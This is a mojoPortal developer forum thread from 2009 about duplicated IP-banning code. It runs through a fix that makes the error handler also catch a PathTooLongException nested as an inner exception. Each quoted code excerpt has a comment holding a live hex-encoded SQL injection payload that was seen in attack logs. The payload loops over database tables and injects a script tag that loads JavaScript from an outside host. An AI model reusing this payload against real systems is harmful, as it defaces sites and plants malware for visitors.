Code BannedIPAddress

This forum is only for questions or discussions about working with the mojoPortal source code in Visual Studio, obtaining the source code from the repository, developing custom features, etc. If your question is not along these lines this is not the right forum. Please try to post your question in the appropriate forum.

Please do not post questions about design, CSS, or skinning here. Use the Help With Skins Forum for those questions.

This forum is for discussing mojoPortal development

You can monitor commits to the repository from this page. We also recommend developers to subscribe to email notifications in the developer forum as occasionally important things are announced.

Before posting questions here you might want to review the developer documentation.

Do not post questions about design, CSS, or skinning here. Use the Help With Skins Forum for those questions.

This thread is closed to new posts. You must sign in to post in the forums.

6/24/2009 2:26:48 AM

mjohn

Total Posts 59

View Posts

Code BannedIPAddress

OS: win 2003
DB: Sqlite
Version:2.3.0.8

Hi, Joe

Code in Global.asax

/////////////////////////////////////////////////////////////////////////////

protected void Application_Error(Object sender, EventArgs e)
{
.................................

try
{
BannedIPAddress b = new BannedIPAddress();
b.BannedIP = HttpContext.Current.Request.UserHostAddress;
b.BannedReason = "PathTooLongException";
b.BannedUtc = DateTime.UtcNow;
b.Save();
}

................................

}

is almost as same as Code in BannedIPBlockingHttpModule.cs.

private void Error(object sender, EventArgs e)
{
......
// don't throw an error in our error handler
try
{
HttpApplication app = (HttpApplication)sender;
HttpContext context = app.Context;

Exception rawException = context.Server.GetLastError();
if (rawException != null)
{
if (rawException is PathTooLongException)
{
// hacking attempts
/* example seen in logs
* /download.aspx?skin=printerfriendly;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
*/
app.Context.Server.ClearError();

/* Blacklist em */
AddIPToBanList(context, "PathTooLongException");
AbortRequestFromBannedIP(context);
return;

}

..............

}

/////////////////////////////////////////////////////////////////

Why same code in two places?

Thanks!

6/24/2009 6:40:57 AM

Joe Audette

Total Posts 18439

View Posts

Re: Code BannedIPAddress

You are right, I am removing the duplicate from global.asax.cs

Best,

Joe

6/26/2009 10:46:22 AM

mjohn

Total Posts 59

View Posts

Re: Code BannedIPAddress

Server OS:Win2003
Client OS:Win2003
DB:Sqlite
Version:2.3.0.9

Hi, Joe
Below Code in BannedIPBlockingHttpModule.cs should be changed as in Global.asax in version 2.3.0.8:

//////////////////////////////////////////////////////////////////////////////////
private void Error(object sender, EventArgs e)
{
.......................
Exception rawException = context.Server.GetLastError();
if (rawException != null)
{
if (rawException is PathTooLongException)
{
// hacking attempts
/* example seen in logs
* /download.aspx?skin=printerfriendly;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
*/
app.Context.Server.ClearError();

/* Blacklist em */
AddIPToBanList(context, "PathTooLongException");
AbortRequestFromBannedIP(context);
return;

}
}
................................................
}

Should be changed as below or as in Global.asax in version 2.3.0.8:

private void Error(object sender, EventArgs e)
{
..........................................
Exception rawException = context.Server.GetLastError();
while (rawException != null) //changed
{
if (rawException is PathTooLongException)
{
// hacking attempts
/* example seen in logs
* /download.aspx?skin=printerfriendly;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
*/
app.Context.Server.ClearError();

/* Blacklist em */
AddIPToBanList(context, "PathTooLongException");
AbortRequestFromBannedIP(context);
return;

}
else
{
rawException = rawException.InnerException; //Added
}
}
......
}
////////////////////////////////////////////////////////////////////////////////

Code in Global.asax in version 2.3.0.8 is right, rawException's type is not PathTooLongExcept, ,but rawException.InnerException's type is PathTooLongExcept.

Thanks!

6/26/2009 11:11:36 AM

Joe Audette

Total Posts 18439

View Posts

Re: Code BannedIPAddress

Hi,

I changed it like this:

Exception rawException = context.Server.GetLastError();
if (rawException != null)
{
if (
(rawException is PathTooLongException)
|| ((rawException.InnerException != null) && (rawException.InnerException is PathTooLongException))
)
{
// hacking attempts
/* example seen in logs
* /download.aspx?skin=printerfriendly;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
*/
app.Context.Server.ClearError();

/* Blacklist em */
AddIPToBanList(context, "PathTooLongException");
AbortRequestFromBannedIP(context);
return;

}

}

Best,

Joe

You must sign in to post in the forums. This thread is closed to new posts.